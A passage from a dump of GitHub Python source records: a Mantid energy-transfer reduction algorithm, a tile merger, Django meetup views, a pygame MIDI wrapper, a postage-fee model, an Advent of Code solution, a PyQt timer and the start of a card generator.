summary(self):\n return \"Runs an energy transfer reduction for an inelastic indirect geometry instrument.\"\n\n def PyInit(self):\n # Input properties\n self.declareProperty(StringArrayProperty(name=\"InputFiles\"), doc=\"Comma separated list of input files\")\n\n self.declareProperty(name=\"SumFiles\", defaultValue=False, doc=\"Toggle input file summing or sequential processing\")\n\n self.declareProperty(name=\"LoadLogFiles\", defaultValue=True, doc=\"Load log files when loading runs\")\n\n self.declareProperty(\n WorkspaceProperty(\"CalibrationWorkspace\", \"\", direction=Direction.Input, optional=PropertyMode.Optional),\n doc=\"Workspace containing calibration data\",\n )\n\n # Instrument configuration properties\n self.declareProperty(\n 
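# [Editor's note — a minimal standalone version of the average-hash
# de-duplication idea in daemon.imageHashing above; the folder path is
# hypothetical.]
import os
import imagehash
from PIL import Image

def dedupe_folder(folder):
    # keep the first file seen for each perceptual hash, skip the rest
    seen, kept = set(), []
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        h = str(imagehash.average_hash(Image.open(path)))
        if h in seen:
            continue  # visually duplicate content
        seen.add(h)
        kept.append(path)
    return kept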
name=\"Instrument\",\n defaultValue=\"\",\n validator=StringListValidator([\"IRIS\", \"OSIRIS\", \"TOSCA\", \"TFXA\"]),\n doc=\"Instrument used during run.\",\n )\n self.declareProperty(\n name=\"Analyser\",\n defaultValue=\"\",\n validator=StringListValidator([\"graphite\", \"mica\", \"fmica\", \"silicon\"]),\n doc=\"Analyser bank used during run.\",\n )\n self.declareProperty(\n name=\"Reflection\",\n defaultValue=\"\",\n validator=StringListValidator([\"002\", \"004\", \"006\", \"111\", \"333\"]),\n doc=\"Reflection number for instrument setup during run.\",\n )\n\n self.declareProperty(\n name=\"Efixed\",\n defaultValue=Property.EMPTY_DBL,\n validator=FloatBoundedValidator(0.0),\n doc=\"Overrides the default Efixed value for the analyser/reflection selection.\",\n )\n\n self.declareProperty(\n IntArrayProperty(name=\"SpectraRange\", values=[0, 1], validator=IntArrayMandatoryValidator()),\n doc=\"Comma separated range of spectra number to use.\",\n )\n self.declareProperty(\n FloatArrayProperty(name=\"BackgroundRange\"), doc=\"Range of background to subtract from raw data in time of flight.\"\n )\n self.declareProperty(name=\"RebinString\", defaultValue=\"\", doc=\"Rebin string parameters.\")\n self.declareProperty(name=\"DetailedBalance\", defaultValue=Property.EMPTY_DBL, doc=\"\")\n self.declareProperty(name=\"ScaleFactor\", defaultValue=1.0, doc=\"Factor by which to scale result.\")\n self.declareProperty(name=\"FoldMultipleFrames\", defaultValue=True, doc=\"Folds multiple framed data sets into a single workspace.\")\n\n # Spectra grouping options\n self.declareProperty(\n name=\"GroupingMethod\",\n defaultValue=\"IPF\",\n validator=StringListValidator([\"Individual\", \"All\", \"File\", \"Workspace\", \"IPF\", \"Custom\"]),\n doc=\"Method used to group spectra.\",\n )\n self.declareProperty(\n WorkspaceProperty(\"GroupingWorkspace\", \"\", direction=Direction.Input, optional=PropertyMode.Optional),\n doc=\"Workspace containing spectra grouping.\",\n )\n self.declareProperty(name=\"GroupingString\", defaultValue=\"\", direction=Direction.Input, doc=\"Spectra to group as string\")\n self.declareProperty(\n FileProperty(\"MapFile\", \"\", action=FileAction.OptionalLoad, extensions=[\".map\"]), doc=\"Workspace containing spectra grouping.\"\n )\n\n # Output properties\n self.declareProperty(\n name=\"UnitX\",\n defaultValue=\"DeltaE\",\n validator=StringListValidator([\"DeltaE\", \"DeltaE_inWavenumber\"]),\n doc=\"X axis units for the result workspace.\",\n )\n\n self.declareProperty(\n WorkspaceGroupProperty(\"OutputWorkspace\", \"\", direction=Direction.Output), doc=\"Workspace group for the resulting workspaces.\"\n )\n\n # pylint: disable=too-many-locals\n def PyExec(self):\n from IndirectReductionCommon import (\n load_files,\n get_multi_frame_rebin,\n get_detectors_to_mask,\n unwrap_monitor,\n process_monitor_efficiency,\n scale_monitor,\n scale_detectors,\n rebin_reduction,\n group_spectra,\n fold_chopped,\n rename_reduction,\n )\n\n self._setup()\n load_prog = Progress(self, start=0.0, end=0.10, nreports=2)\n load_prog.report(\"loading files\")\n self._workspace_names, self._chopped_data, masked_detectors = load_files(\n self._data_files,\n self._ipf_filename,\n self._spectra_range[0],\n self._spectra_range[1],\n self._sum_files,\n self._load_logs,\n None,\n self._sum_files,\n )\n load_prog.report(\"files loaded\")\n\n process_prog = Progress(self, start=0.1, end=0.9, nreports=len(self._workspace_names))\n for c_ws_name in self._workspace_names:\n 
process_prog.report(\"processing workspace\" + c_ws_name)\n is_multi_frame = isinstance(mtd[c_ws_name], WorkspaceGroup)\n\n # Get list of workspaces\n if is_multi_frame:\n workspaces = mtd[c_ws_name].getNames()\n else:\n workspaces = [c_ws_name]\n\n # Process rebinning for framed data\n rebin_string_2, num_bins = get_multi_frame_rebin(c_ws_name, self._rebin_string)\n\n if not self._sum_files:\n masked_detectors = get_detectors_to_mask(workspaces)\n else:\n summed_file_masked_detectors = get_detectors_to_mask(workspaces)\n masked_detectors = add_missing_elements(summed_file_masked_detectors, masked_detectors)\n\n # Process workspaces\n for ws_name in workspaces:\n # Set Efixed if given to algorithm\n if self._efixed != Property.EMPTY_DBL:\n SetInstrumentParameter(\n Workspace=ws_name,\n ComponentName=self._analyser,\n ParameterName=\"Efixed\",\n ParameterType=\"Number\",\n Value=str(self._efixed),\n )\n\n monitor_ws_name = ws_name + \"_mon\"\n\n # Process monitor\n if not unwrap_monitor(ws_name):\n ConvertUnits(InputWorkspace=monitor_ws_name, OutputWorkspace=monitor_ws_name, Target=\"Wavelength\", EMode=\"Elastic\")\n\n process_monitor_efficiency(ws_name)\n scale_monitor(ws_name)\n\n # Do background removal if a range was provided\n if self._background_range is not None:\n ConvertToDistribution(Workspace=ws_name)\n CalculateFlatBackground(\n InputWorkspace=ws_name,\n OutputWorkspace=ws_name,\n StartX=self._background_range[0],\n EndX=self._background_range[1],\n Mode=\"Mean\",\n )\n ConvertFromDistribution(Workspace=ws_name)\n\n # Divide by the calibration workspace if one was provided\n if self._calibration_ws is not None:\n index_min = self._calibration_ws.getIndexFromSpectrumNumber(int(self._spectra_range[0]))\n index_max = self._calibration_ws.getIndexFromSpectrumNumber(int(self._spectra_range[1]))\n\n CropWorkspace(\n InputWorkspace=self._calibration_ws,\n OutputWorkspace=\"__cropped_calib\",\n StartWorkspaceIndex=index_min,\n EndWorkspaceIndex=index_max,\n )\n\n Divide(LHSWorkspace=ws_name, RHSWorkspace=\"__cropped_calib\", OutputWorkspace=ws_name)\n\n DeleteWorkspace(\"__cropped_calib\")\n\n # Scale detector data by monitor intensities\n scale_detectors(ws_name, \"Indirect\")\n\n # Remove the no longer needed monitor workspace\n DeleteWorkspace(monitor_ws_name)\n\n # Convert to energy\n ConvertUnits(InputWorkspace=ws_name, OutputWorkspace=ws_name, Target=\"DeltaE\", EMode=\"Indirect\")\n CorrectKiKf(InputWorkspace=ws_name, OutputWorkspace=ws_name, EMode=\"Indirect\")\n\n # Handle rebinning\n rebin_reduction(ws_name, self._rebin_string, rebin_string_2, num_bins)\n\n # Detailed balance\n if self._detailed_balance != Property.EMPTY_DBL:\n corr_factor = 11.606 / (2 * self._detailed_balance)\n ExponentialCorrection(InputWorkspace=ws_name, OutputWorkspace=ws_name, C0=1.0, C1=corr_factor, Operation=\"Multiply\")\n\n # Scale\n if self._scale_factor != 1.0:\n Scale(InputWorkspace=ws_name, OutputWorkspace=ws_name, Factor=self._scale_factor, Operation=\"Multiply\")\n\n # Group spectra\n group_spectra(\n ws_name,\n masked_detectors=masked_detectors,\n method=self._grouping_method,\n group_file=self._grouping_map_file,\n group_ws=self._grouping_ws,\n group_string=self._grouping_string,\n )\n\n if self._fold_multiple_frames and is_multi_frame:\n fold_chopped(c_ws_name)\n\n # Convert to output units if needed\n if self._output_x_units != \"DeltaE\":\n ConvertUnits(InputWorkspace=c_ws_name, OutputWorkspace=c_ws_name, EMode=\"Indirect\", Target=self._output_x_units)\n\n # Rename output workspaces\n 
output_workspace_names = [rename_reduction(ws_name, self._sum_files) for ws_name in self._workspace_names]\n\n summary_prog = Progress(self, start=0.9, end=1.0, nreports=4)\n\n # Group result workspaces\n summary_prog.report(\"grouping workspaces\")\n self.output_ws = GroupWorkspaces(InputWorkspaces=output_workspace_names, OutputWorkspace=self._output_ws)\n\n # The spectrum numbers need to start at 1 not 0 if spectra are grouped\n if self.output_ws.getNumberOfEntries() == 1:\n for i in range(len(self.output_ws.getItem(0).getSpectrumNumbers())):\n self.output_ws.getItem(0).getSpectrum(i).setSpectrumNo(i + 1)\n\n self.setProperty(\"OutputWorkspace\", mtd[self._output_ws])\n\n summary_prog.report(\"Algorithm complete\")\n\n def validateInputs(self):\n \"\"\"\n Validates algorithm properties.\n \"\"\"\n issues = dict()\n\n # Validate the instrument configuration by checking if a parameter file exists\n instrument_name = self.getPropertyValue(\"Instrument\")\n analyser = self.getPropertyValue(\"Analyser\")\n reflection = self.getPropertyValue(\"Reflection\")\n\n ipf_filename = os.path.join(\n config[\"instrumentDefinition.directory\"], instrument_name + \"_\" + analyser + \"_\" + reflection + \"_Parameters.xml\"\n )\n\n if not os.path.exists(ipf_filename):\n error_message = \"Invalid instrument configuration\"\n issues[\"Instrument\"] = error_message\n issues[\"Analyser\"] = error_message\n issues[\"Reflection\"] = error_message\n\n # Validate spectra range\n spectra_range = self.getProperty(\"SpectraRange\").value\n if len(spectra_range) != 2:\n issues[\"SpectraRange\"] = \"Range must contain exactly two items\"\n elif spectra_range[0] > spectra_range[1]:\n issues[\"SpectraRange\"] = \"Range must be in format: lower,upper\"\n\n # Validate background range\n background_range = _elems_or_none(self.getProperty(\"BackgroundRange\").value)\n if background_range is not None:\n if len(background_range) != 2:\n issues[\"BackgroundRange\"] = \"Range must contain exactly two items\"\n elif background_range[0] > background_range[1]:\n issues[\"BackgroundRange\"] = \"Range must be in format: lower,upper\"\n\n # Validate grouping method\n grouping_method = self.getPropertyValue(\"GroupingMethod\")\n grouping_ws = _ws_or_none(self.getPropertyValue(\"GroupingWorkspace\"))\n\n if grouping_method == \"Workspace\" and grouping_ws is None:\n issues[\"GroupingWorkspace\"] = \"Must select a grouping workspace for current GroupingWorkspace\"\n\n efixed = self.getProperty(\"Efixed\").value\n if efixed != Property.EMPTY_DBL and instrument_name not in [\"IRIS\", \"OSIRIS\"]:\n issues[\"Efixed\"] = \"Can only override Efixed on IRIS and OSIRIS\"\n\n return issues\n\n def _setup(self):\n \"\"\"\n Gets algorithm properties.\n \"\"\"\n\n # Get properties\n self._data_files = self.getProperty(\"InputFiles\").value\n self._sum_files = self.getProperty(\"SumFiles\").value\n self._load_logs = self.getProperty(\"LoadLogFiles\").value\n self._calibration_ws = _ws_or_none(self.getPropertyValue(\"CalibrationWorkspace\"))\n\n self._instrument_name = self.getPropertyValue(\"Instrument\")\n self._analyser = self.getPropertyValue(\"Analyser\")\n self._reflection = self.getPropertyValue(\"Reflection\")\n self._efixed = self.getProperty(\"Efixed\").value\n\n self._spectra_range = self.getProperty(\"SpectraRange\").value\n self._background_range = _elems_or_none(self.getProperty(\"BackgroundRange\").value)\n self._rebin_string = _str_or_none(self.getPropertyValue(\"RebinString\"))\n self._detailed_balance = 
self.getProperty(\"DetailedBalance\").value\n self._scale_factor = self.getProperty(\"ScaleFactor\").value\n self._fold_multiple_frames = self.getProperty(\"FoldMultipleFrames\").value\n\n self._grouping_method = self.getPropertyValue(\"GroupingMethod\")\n self._grouping_ws = _ws_or_none(self.getPropertyValue(\"GroupingWorkspace\"))\n self._grouping_string = _str_or_none(self.getPropertyValue(\"GroupingString\"))\n self._grouping_map_file = _str_or_none(self.getPropertyValue(\"MapFile\"))\n\n self._output_x_units = self.getPropertyValue(\"UnitX\")\n\n self._output_ws = self.getPropertyValue(\"OutputWorkspace\")\n\n # Disable sum files if there is only one file\n if len(self._data_files) == 1:\n if self._sum_files:\n logger.warning(\"SumFiles disabled when only one input file is provided.\")\n self._sum_files = False\n\n # Get the IPF filename\n self._ipf_filename = os.path.join(\n config[\"instrumentDefinition.directory\"],\n self._instrument_name + \"_\" + self._analyser + \"_\" + self._reflection + \"_Parameters.xml\",\n )\n logger.information(\"Instrument parameter file: %s\" % self._ipf_filename)\n\n # Warn when grouping options are to be ignored\n if self._grouping_method != \"Workspace\" and self._grouping_ws is not None:\n logger.warning(\"GroupingWorkspace will be ignored by selected GroupingMethod\")\n\n if self._grouping_method != \"File\" and self._grouping_map_file is not None:\n logger.warning(\"MapFile will be ignored by selected GroupingMethod\")\n\n # The list of workspaces being processed\n self._workspace_names = []\n\n\n# Register algorithm with Mantid\nAlgorithmFactory.subscribe(ISISIndirectEnergyTransfer)\n","repo_name":"mantidproject/mantid","sub_path":"Framework/PythonInterface/plugins/algorithms/WorkflowAlgorithms/ISISIndirectEnergyTransfer.py","file_name":"ISISIndirectEnergyTransfer.py","file_ext":"py","file_size_in_byte":16601,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"39"} +{"seq_id":"3114891786","text":"import sys\nfrom TileMerger import *\n\n\n\n# input tile folder \ninputTileFolder = \"D:\\\\Dropbox\\\\Instagram\\\\likes\"\n#inputTileFolder = \"D:\\\\projets\\\\code\\\\autres\\\\python\\\\instaMerge\\\\test\\\\input\"\n\n\nmerger = TileMerger()\nmerger.setNbXtiles(24)\nmerger.setNbYtiles(34)\nmerger.setMarginColor(\"#FFFFFF\")\nmerger.setMarginSize(0)\nmerger.setTileExtention(\".jpg\")\nmerger.setTileDirectory(inputTileFolder)\nmerger.setOutputDirectory(\"D:\\\\projets\\\\code\\\\autres\\\\python\\\\instaMerge\\\\test\\\\output\")\nmerger.setTitle(\"instaMergeNoMargin\")\nmerger.mergeTilesAndExport()\n\nos.system(\"pause\")\n","repo_name":"jonathanlurie/pythonStuff","sub_path":"imageMerge/import_tiles.py","file_name":"import_tiles.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16567901987","text":"from django.shortcuts import render, redirect\nfrom .models import Meetup, Participant\nfrom .forms import RegistrationForm\n\n'''\nfunctions will be invoked automatically by django when we have an incoming request for a certain URL.\n'''\n\n\ndef index(request):\n meetups = Meetup.objects.all()\n template = render(request, 'meetups/index.html', {'meetups': meetups})\n return template\n\ndef meetup_details(request, meetup_slug):\n try:\n selected_meetup = Meetup.objects.get(slug=meetup_slug) # selected_meetup is a Meetup object. 
get() gets the correct object based on the slug passed in.\n if request.method == 'GET':\n registration_form = RegistrationForm()\n \n else:\n registration_form = RegistrationForm(request.POST) # passes in the POST request's fields into RegistrationForm\n if registration_form.is_valid(): # checks if inputs are valid, built in function\n user_email = registration_form.cleaned_data['email']\n participant, was_created = Participant.objects.get_or_create(email=user_email)\n selected_meetup.participants.add(participant) # adds the participant created above into the participants attribute in the Meetup object. \n return redirect('confirm_registration', meetup_slug=meetup_slug)\n\n return render(request, 'meetups/meetup-details.html', {\n 'meetup_found': True,\n 'meetup': selected_meetup,\n 'form': registration_form\n })\n except Exception as exc:\n return render(request, 'meetups/meetup-details.html', {'meetup_found': False})\n \n\ndef confirm_registration(request, meetup_slug):\n meetup = Meetup.objects.get(slug=meetup_slug)\n return render(request, 'meetups/registration-success.html', {'meetup': meetup})","repo_name":"tanshihuai/Django-Project","sub_path":"django_course_site/meetups/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29380853401","text":"from os import environ\nenviron['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\n\nimport pygame\nimport pygame.midi\nimport pygame.version\nimport time\n\nimport midi_util\n\n\nclass MIDI:\n def __init__(self, verbose=False):\n self._verbose = verbose\n self._midi_in = None\n self._midi_out = None\n self._midi_in_port_id = None\n self._midi_out_port_id = None\n self._midi_in_port_name = None\n self._midi_out_port_name = None\n\n def _init(self):\n if not self._midi_in and not self._midi_out:\n # Initialize PyGame MIDI\n pygame.midi.init()\n\n def _end(self):\n if not self._midi_in and not self._midi_out:\n # Quit PyGame MIDI\n pygame.midi.quit()\n\n @staticmethod\n def get_backend_name():\n return 'pygame'\n\n @staticmethod\n def get_backend_version():\n return pygame.version.ver\n\n # def print_available_ports(self):\n # # Initialize PyGame MIDI\n # self._init()\n #\n # # Print MIDI input and output port ID's and names\n # print('MIDI output ports:')\n # port_id = 1\n # for i in range(pygame.midi.get_count()):\n # (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n # if midi_output:\n # print(' {}: {} OUT'.format(port_id, midi_name.decode('utf-8')))\n # port_id += 1\n #\n # # Print MIDI input and output port ID's and names\n # print('MIDI input ports:')\n # port_id = 1\n # for i in range(pygame.midi.get_count()):\n # (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n # if midi_input:\n # print(' {}: {} IN'.format(port_id, midi_name.decode('utf-8')))\n # port_id += 1\n #\n # # End PyGame MIDI\n # self._end()\n\n def get_ports_in(self):\n # Initialize PyGame MIDI\n self._init()\n\n ports = []\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_input:\n ports.append(midi_name.decode('utf-8'))\n\n # End PyGame MIDI\n self._end()\n\n return ports\n\n def is_port_in_open(self):\n if self._midi_in:\n return True\n return False\n\n def port_in_open(self, port_id):\n if self.is_port_in_open():\n return True\n\n # Initialize PyGame MIDI\n 
self._init()\n\n # Open MIDI input port\n port_in_id = 0\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_input:\n if port_id == port_in_id:\n # Open MIDI input port\n self._midi_in = pygame.midi.Input(i)\n\n # Get MIDI input port id\n self._midi_in_port_id = port_in_id\n\n # Get MIDI input port name\n self._midi_in_port_name = midi_name.decode('utf-8')\n self._midi_in_port_name += ' IN'\n\n break\n port_in_id += 1\n\n if not self._midi_in:\n return False\n\n # Return MIDI input port open status\n return self.is_port_in_open()\n\n def port_in_close(self):\n if self._midi_in:\n self._midi_in.close()\n self._midi_in = None\n self._midi_in_port_name = None\n\n # End PyGame MIDI\n self._end()\n\n def get_port_in_id(self):\n if self._midi_in_port_id:\n return self._midi_in_port_id\n\n def get_port_in_name(self):\n if self._midi_in_port_name:\n return self._midi_in_port_name\n\n def get_ports_out(self):\n # Initialize PyGame MIDI\n self._init()\n\n ports = []\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_output:\n ports.append(midi_name.decode('utf-8'))\n\n # End PyGame MIDI\n self._end()\n\n return ports\n\n def is_port_out_open(self):\n if self._midi_out:\n return True\n return False\n\n def port_out_open(self, port_id):\n if self.is_port_out_open():\n return True\n\n # Initialize PyGame MIDI\n self._init()\n\n # Check MIDI output port ID\n if port_id < 0:\n if self._verbose:\n print('Error: Invalid MIDI output port ID {}'.format(port_id))\n return False\n\n # Open MIDI output port\n port_out_id = 0\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_output:\n if port_out_id == port_id:\n # Open MIDI output port\n self._midi_out = pygame.midi.Output(i)\n\n # MIDI output port id\n self._midi_out_port_id = port_out_id\n\n # Get MIDI output port name\n self._midi_out_port_name = midi_name.decode('utf-8')\n self._midi_out_port_name += ' OUT'\n\n break\n port_out_id += 1\n\n # Check if MIDI port is output\n if not self._midi_out:\n if self._verbose:\n print('Error: \"{}: {}\" is not a MIDI output port'.format(port_id, self._midi_out_port_name))\n return False\n\n # Return MIDI output port open status\n return self.is_port_out_open()\n\n def port_out_close(self):\n if self._midi_out:\n self._midi_out.close()\n self._midi_out = None\n self._midi_out_port_name = None\n\n # End PyGame MIDI\n self._end()\n\n def get_port_out_id(self):\n if self._midi_out_port_id:\n return self._midi_out_port_id\n\n def get_port_out_name(self):\n if self._midi_out_port_name:\n return self._midi_out_port_name\n\n def send_message(self, message):\n if not self.is_port_out_open():\n if self._verbose:\n print('MIDI output port not open')\n return False\n\n if self._verbose:\n midi_util.print_message('TX', message)\n\n t_start = time.time()\n if message[0] == 0xf0:\n # Write SYSEX message asynchronous to MIDI output port\n self._midi_out.write_sys_ex(pygame.midi.time(), message)\n else:\n # Write MIDI message asynchronous to MIDI output port\n self._midi_out.write(message)\n\n # Wait until message transferred\n wait_time = len(message) * midi_util.MIDI_BYTE_TIME\n wait_time -= time.time() - t_start\n if wait_time > 0:\n time.sleep(wait_time)\n\n return True\n\n def receive_message(self):\n if not self.is_port_in_open():\n if 
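# [Editor's note — compact illustration of the non-blocking poll()/read()
# receive pattern the MIDI class above uses; the 16-event batch size is an
# arbitrary choice.]
import time
import pygame.midi

def drain_midi_events(midi_in, seconds=1.0):
    # poll() reports whether data is waiting; read(n) returns up to n
    # [[status, data1, data2, data3], timestamp] events
    deadline = time.time() + seconds
    events = []
    while time.time() < deadline:
        if midi_in.poll():
            events.extend(midi_in.read(16))
    return events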
self._verbose:\n print('MIDI output port not open')\n return\n\n # Asynchronous MIDI receive\n if self._midi_in.poll():\n # Read one 4 Bytes MIDI message\n message = self._midi_in.read(1)[0][0]\n\n if self._verbose:\n midi_util.print_message('RX', message)\n\n return message\n","repo_name":"Erriez/midi-sysex-io","sub_path":"midi_pygame.py","file_name":"midi_pygame.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"9828561596","text":"# -*- coding:utf8 -*-\nfrom __future__ import unicode_literals\nimport datetime\nfrom django.db import models\nfrom shopapp.signals import modify_fee_signal\n\n\nclass FeeRule(models.Model):\n payment = models.FloatField(verbose_name='交易金额')\n discount = models.FloatField(default=1, verbose_name='邮费折扣')\n adjust_fee = models.FloatField(null=True, verbose_name='邮费调整金额')\n\n class Meta:\n db_table = 'shop_modifyfee_feerule'\n app_label = 'modifyfee'\n verbose_name = u'邮费规则'\n verbose_name_plural = u'邮费规则列表'\n\n def __unicode__(self):\n return '<%d,%s,%s,%s>' % (self.id, str(self.payment), str(self.discount), str(self.adjust_fee))\n\n\nclass ModifyFee(models.Model):\n id = models.AutoField(primary_key=True)\n tid = models.BigIntegerField(verbose_name='淘宝交易ID')\n buyer_nick = models.CharField(max_length=32, verbose_name='买家昵称')\n total_fee = models.CharField(max_length=10, verbose_name='订单金额')\n payment = models.CharField(max_length=10, verbose_name='实付金额')\n post_fee = models.CharField(max_length=10, verbose_name='实付邮费')\n modify_fee = models.CharField(max_length=10, verbose_name='修改邮费')\n modified = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n db_table = 'shop_modifyfee_modifyfee'\n app_label = 'modifyfee'\n verbose_name = u'邮费修改记录'\n verbose_name_plural = u'邮费修改记录列表'\n\n def __unicode__(self):\n return '<%d,%s,%s,%s>' % (self.id, self.name, self.payment, self.modify_fee)\n\n\ndef modify_post_fee_func(sender, user_id, trade_id, *args, **kwargs):\n from shopback.orders.models import Trade\n from shopback.trades.models import MergeTrade\n try:\n trade = Trade.get_or_create(trade_id, user_id)\n except:\n pass\n else:\n payment = float(trade.payment or '0')\n post_fee = float(trade.post_fee or '0')\n fee_rules = FeeRule.objects.order_by('-payment')\n for rule in fee_rules:\n if payment >= rule.payment:\n modify_fee = rule.adjust_fee if rule.adjust_fee != None else post_fee * (rule.discount or 1.0)\n response = apis.taobao_trade_postage_update(tid=trade_id,\n post_fee=modify_fee,\n tb_user_id=trade.user.visitor_id)\n postage = response['trade_postage_update_response']['trade']\n ModifyFee.objects.get_or_create(tid=trade_id,\n buyer_nick=trade.buyer_nick,\n total_fee=postage['total_fee'],\n post_fee=post_fee,\n modify_fee=postage['post_fee'],\n payment=postage['payment'],\n modified=postage['modified'])\n Trade.objects.filter(id=trade_id).update(total_fee=postage['total_fee'],\n post_fee=postage['post_fee'],\n payment=postage['payment'],\n modified=postage['modified'])\n MergeTrade.objects.filter(tid=trade_id).update(total_fee=postage['total_fee'],\n post_fee=postage['post_fee'],\n payment=postage['payment'],\n modified=postage['modified'])\n break\n\n\nmodify_fee_signal.connect(modify_post_fee_func, sender='modify_post_fee', 
dispatch_uid='modify_post_fee')\n","repo_name":"xiaolusys/xiaolusys","sub_path":"shopapp/modifyfee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"17805802171","text":"\ndef getElves(file_name):\n '''\n Function to import the list of calories per elf, splitting the list by blank line.\n '''\n\n with open(file_name, \"r\") as inputfile:\n elfList = inputfile.read().split(\"\\n\\n\")\n \n return elfList\n\n\ndef findCalories(elfList):\n '''\n Taking the list of Elves and seeing which Elf is carrying the most calories.\n\n '''\n maxCalories = 0\n for elf in elfList:\n elfCalories = elf.strip().split(\"\\n\")\n elfCalories = [int(i) for i in elfCalories]\n if sum(elfCalories) >= maxCalories:\n maxCalories = sum(elfCalories)\n \n return maxCalories\n\ndef findTopThreeCalories(elfList):\n\n '''\n Taking the list of Elves and creating a dict of all the totals, then returning the sum of the top 3. \n\n '''\n \n summedCalories = []\n for elf in elfList:\n elfCalories = elf.strip().split(\"\\n\")\n elfCalories = [int(i) for i in elfCalories]\n summedCalories.append(sum(elfCalories))\n \n return sum(sorted (summedCalories, reverse=True) [0:3])\n\nif __name__ == \"__main__\":\n input_path = \"./day_01/input.txt\"\n\n elfList = getElves(input_path)\n # maxCalories = findCalories(elfList)\n topThreeCalories = findTopThreeCalories(elfList)\n print (topThreeCalories)\n","repo_name":"mckechniefraz/Advent_of_code_2022","sub_path":"day_01/calorie_counting.py","file_name":"calorie_counting.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36249865241","text":"import sys\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtCore import QObject, QThread, pyqtSignal\r\nfrom time_ui import Ui_Time\r\nfrom t_time import timing\r\nfrom signals import signals\r\n\r\nclass TimeMain(QObject):\r\n\tdef __init__(self):\r\n\t\tprint(\"time running\")\r\n\t\tsuper().__init__()\r\n\r\n\t\tself.MainWindow = QtWidgets.QMainWindow()\r\n\t\tself.ui = Ui_Time()\r\n\t\tself.ui.setupUi(self.MainWindow)\r\n\t\tself.MainWindow.show()\r\n\r\n\t\tself.time_thread = QThread()\r\n\t\tself.time = timing()\r\n\t\tself.time.moveToThread(self.time_thread)\r\n\t\tself.time_thread.start()\r\n\r\n\t\tself.ui.label_5.setText(\" \" + str(0))\r\n\t\tself.ui.label_3.setText(\" 0:0:0\")\r\n\t\tsignals.time.emit(0,0,0,0)\r\n\r\n\t\tsignals.time.connect(self.update_gui)\r\n\t\tsignals.pause.connect(self.pause)\r\n\t\tself.ui.lineEdit.editingFinished.connect(self.set_multiplier)\r\n\r\n\r\n\tdef update_gui(self,s,m,h,t):\r\n\t\tself.ui.label_3.setText(\" \" + str(h) + \":\" + str(m) + \":\" + str(s))\r\n\r\n\tdef set_multiplier(self):\r\n\t\tmult = self.ui.lineEdit.text()\r\n\r\n\t\tAlphaFlag = False\r\n\t\t#Error checking to make sure input is only an INT\r\n\t\tfor i in self.ui.lineEdit.text():\r\n\t\t\tif(i.isalpha() == True):\r\n\t\t\t\tAlphaFlag = True\r\n\r\n\t\tif(AlphaFlag == True):\r\n\t\t\tself.ui.label_5.setText(\" \" + str(1))\r\n\t\t\tsignals.time_multiplier.emit(1)\r\n\t\telif(self.ui.lineEdit.text().isdigit() == True):\r\n\t\t\tAlphaFlag = False\r\n\t\t\tself.ui.label_5.setText(\" \" + str(mult))\r\n\t\t\tsignals.time_multiplier.emit(int(mult))\r\n\r\n\tdef pause(self):\r\n\t\tself.ui.label_5.setText(\" \" + str(0))\r\n\t\tsignals.time_multiplier.emit(0)\r\n\r\n\r\n\r\nif __name__ == 
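# [Editor's note — illustrative alternative to the sort-and-slice in
# findTopThreeCalories above, using heapq.nlargest.]
import heapq

def top_three_total(per_elf_totals):
    # nlargest avoids sorting the whole list just to take three items
    return sum(heapq.nlargest(3, per_elf_totals))

assert top_three_total([100, 300, 200, 50, 400]) == 900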
'__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n c = TimeMain()\r\n app.exec_()\r\n","repo_name":"robertfoster5/1140_Team_Falcon","sub_path":"senv/time_main.py","file_name":"time_main.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12702121660","text":"import textwrap, random, numpy as np, math, os\nfrom PIL import Image, ImageFont, ImageDraw\nfrom time import perf_counter\nfrom os import listdir\n\n#variables for layout\nmargins_size, cells_size, border_size = (33, 288, 10)\nhighlight_opacity, shadow_opacity, celltop_opacity, cellbottom_opacity = (170, 128, 140, 80)\nletters_per_line, name_line_size = (13, 150)\n\npresets = {\n \"direct\":{\n \"type\":\"direct\",\n \"color\":\"#e41318ff\",\n \"namecolor\":(255,255,255)\n },\n \"e3\":{\n \"type\":\"e3\",\n \"color\":\"#353a4aff\",\n \"namecolor\":(255,255,255)\n },\n \"stateofplay\":{\n \"type\":\"stateofplay\",\n \"color\":\"#006fcdff\",\n \"namecolor\":(255,255,255)\n },\n \"tga\":{\n \"type\":\"tga\",\n \"color\":\"#eeeeeeff\",\n \"namecolor\":(60,60,60)\n }\n}\n\nif True:\n while True:\n print(\"What type of card are you doing? Choices are \" + ', '.join(presets.keys()))\n response = input()\n type = presets[response][\"type\"]\n color = presets[response][\"color\"]\n namecolor = presets[response][\"namecolor\"]\n if response not in 